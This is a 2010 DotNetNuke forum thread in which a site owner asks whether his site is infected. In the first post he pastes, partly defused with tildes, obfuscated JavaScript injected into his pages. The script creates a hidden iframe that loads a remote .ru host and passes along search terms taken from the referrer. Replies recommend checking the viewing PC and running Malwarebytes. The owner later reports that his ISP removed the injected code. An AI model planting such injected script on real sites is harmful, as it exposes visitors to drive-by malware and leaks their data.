You need to Register for free and Login to post a message in the forum.

Forum

Is my site infected?
Last Post 2010-04-23 05:33 PM by mgordon. 4 Replies.
Printer Friendly
  •  
  •  
  •  
  •  
  •  
Sort:
PrevPrev NextNext
You are not authorized to post a reply.
Author Messages
ChipUser is Offline
Nuke Active Member
Nuke Active Member
Posts:24

--
2010-03-22 01:21 AM
    Hello,

    I fear one of my websites is infected with some Trojan or other malware.  A few days ago I started to notice that every time I navigated to a new page a strange URL would briefly appear in the status bar).  I looked at the page source and did not see anything.  Then I viewed my pages with Firebug and found the following code in it (address is listed in iFrame):

    <~~s~c~r~i~p~t~ src="~http~://~imgur-com~.mediaset.it.rottentomatoes-com.ExcellentBlender.ru:8080/cloob.com/cloob.com/google.com/opera.com/nih.gov.php" defer=" ">
    Puu3cic = 'h^$!^)t)t($!p#@:^!/(/)#(i$(#m@g$u)r&&(-$@c)&o(m((^.(#m@!e))d()!i^&^!a&s)^@e)(@t@)^.((i!$#t^.!#r&$o$t$)(t^e&&n^&#t# )^o^#!m!!a&)#t$!#&o^!e)@$$s^)-@$c&@o$@&$#m!!!.$e(x!@c^)e$!(l)&l@)(e^(!n^t@b^^#l@#e(!^n!@#d!e)$r&@.@#&&r&@ #u^'.replace(/\^|\!|\)|\(|@|&|\$|#/ig, '');
    3Y5wegt = 'Y5wegtSa7y67xu';
    4O9q7hm = document.createElement('iIf(rha(m(eI'.replace(/[Iku\(h]/g, ''));
    5Y5wegt = 'Y5wegtSa7y67xu';
    6Sa7y67xu = '';
    7G5n9dq56 = '';
    8Y5wegt = document.referrer;
    9function Nmjhcpe2(A4jk0ry,Q71xj0ul){
    10if (Y5wegt.indexOf(A4jk0ry) != -1){
    11 Sa7y67xu=A4jk0ry;
    12 Vwx8wmg = Y5wegt.indexOf(Q71xj0ul+'=');
    13 if (Vwx8wmg != -1){
    14 G5n9dq56 = Y5wegt.substring(Vwx8wmg+2).split('&')[0];
    15 }
    16}
    17}
    18//Nmjhcpe2('google.','q');Nmjhcpe2('search.yahoo.','p');Nmjhcpe2('ask.com','q ');
    19
    20O9q7hm.style.visibility = 'h(@^$#i(&&d$@$!d$@e@n$!!#'.replace(/&|@|\(|#|\!|\$|\^|\)/ig, '');
    21O9q7hm.src = Puu3cic+':28z0Q820z/2iQn2d2eQx2.7p2h7pQ?7j2a2=Q&zjQl7=z'.replace(/[zI72Q]/g, '')+Sa7y67xu+'&kl='+G5n9dq56;
    22document.body.appendChild(O9q7hm);
    <~/script>
    <~~i~f~r~a~m~e~ style="visibility: hidden;" src="~http~://~imgur-com~.mediaset.it.rottentomatoes-com.excellentblender.ru:8080/index.php?ja=&jl=&kl=">
    <~html>
    <~head><~/head>
    <~body><~/body>
    <~/html>
    <~/iframe>
    <~/body>


    I added ~ to hopefully disable everything while letting you see the code.  Has anyone seen anything like this before?  Any ideas how to get rid of it?  My ISP is stumped too.  There are no strange files (php or otherwise) on my site.  I tried upgrading from 5.1.4 to 5.2.3 to see if the process of writing over files would fix it, it did not.  Any suggestions would be greatly appreciated!

    Chip
    Joseph CraigUser is Offline
    DNN Creative Support
    Nuke Master VI
    Nuke Master VI
    Posts:9008
    Avatar

    --
    2010-03-22 10:42 PM
    If your host can't find anything, try viewing your site from a different computer. It's possible that the infection is on your viewing computer. To me, this looks like some nasty javascript.

    Joe Craig, DNN Creative Support

    Subscribe to DNNCreative
    I recommend PowerDNN for DotNetNuke Hosting.
    mgordonUser is Offline
    Nuke Master
    Nuke Master
    Posts:208
    Avatar

    --
    2010-03-24 04:10 PM
    I would download and install a product called Malwarebytes from www.malwarebytes.org/

    It is an excellent product. It has a free version that you can run, and it has a paid version that will run in the background protecting you.

    Give it a shot. It sounds to me like it's a virus on your computer and not your website as Joe said.
    Mark Gordon
    Webmonkey
    ChipUser is Offline
    Nuke Active Member
    Nuke Active Member
    Posts:24

    --
    2010-04-22 06:52 PM
    Hi Everyone,

    Sorry for the much delayed post. I wanted to let you know everything was resolved some time ago. Joseph you were correct - someone inserted some javascript into a few files on my site. My ISP cleaned them out and I have been running fine ever since.

    Mark, I took your advice and tried the free version of Malwarebytes. I liked it so much I purchased five licenses for it! I tried running one of the licenses on a SBS server. It caused problems with network drive mapping. Other than the fact that I cannot use it on a server, the software has been great. Thanks again!

    Chip
    mgordonUser is Offline
    Nuke Master
    Nuke Master
    Posts:208
    Avatar

    --
    2010-04-23 05:33 PM
    Chip, I'm happy everything was resolved! This community is a good community here at DNNCreative.
    Mark Gordon
    Webmonkey
    You are not authorized to post a reply.


    Active Forums 4.3

    Latest Forum Posts

    RE: "Good" hosting providers by ejcullen rene
    informative!!!
    RE: URL Master Module doesn't work on IHostASP hosting by ejcullen rene
    informative!!!
    RE: shared web hosting by ejcullen rene
    informative!!. i got hosting service from http://www.thewebpole.com/ my hosting company offers you
    RE: iPhone website logo in DNN root directory by JohnnieD
    I'm supposed to add this link to make my custom logo show up on iPhones. Where in DNN would I a
    iPhone website logo in DNN root directory by JohnnieD
    I'm trying to put an iPhone logo that I made into my site so when someone saves the website on their
    RE: Fixed size container by Joseph Craig
    Use an HTML module and style the container to have a fixed height and width. Set the overflow attr
    Fixed size container by Aggiedan97
    I am looking for advice or an actual container that has a fixed height (and width). An HTML module w
    RE: DNN 6.1 app_offline.htm by Joseph Craig
    If the site "works" in Chrome, Firefox and Safari, but not in IE8 look to IE8 as the problem. It is
    RE: DNN site automatically redirects to a different domain name. by Joseph Craig
    Make a copy what is in the portalalias table and then remove all but the localhost entry. Verify th
    DNN 6.1 app_offline.htm by Dave Hassall
    Hi As recommended I have successfully been using the app_offline.htm whilst performing upgrades t
    RE: DNN site automatically redirects to a different domain name. by imran shaikh
    Hi i have done same as mention in this post my dnn folder name is Trademaxomanupg with
    Enforce Terms Tutorial Update by Vistalogix Corporation
    I tried configuring my DNN 6.1.2 install to have a required "accept terms" checkbox as described in
    RE: Best Practices for Modifying a Custom Module by Joseph Craig
    Start up the development website, then install the module using the package that you have. Then, yo
    Best Practices for Modifying a Custom Module by schilders
    Good Morning, I'm needing to modify a custom built module created by another developer targeted f
    RE: Admin menu problem by alireza arabiyan
    hi in localhost i have http://localhost/senf/خانه.aspx and http://localhost/senf/Admi
    RE: Admin menu problem by Joseph Craig
    Yes, that is what you should have done. What is the URL for your home page? What is the URL for
    RE: Admin menu problem by alireza arabiyan
    hi first in localhost i add my domain.com as portal alias. then copy all files to host , restore my
    RE: Admin menu problem by Joseph Craig
    How did you move it? Have you added an entry in the portalalias table for the site's domain name?
    RE: Re: SQL SERVER 2008 R2 Remote connection by Joseph Craig
    Set up a user with dbo privileges and set the connection string for that user, rather than using Win
    Re: SQL SERVER 2008 R2 Remote connection by Prakasam Srinivasan
    I have successfully configured MSSQL Server 2008 r2 remote connection. I am using windows 7 and it h
    You are not logged in.
    You must log in to access all 
    650+ videos, tutorials, podcasts, and more.
    RSS Feeds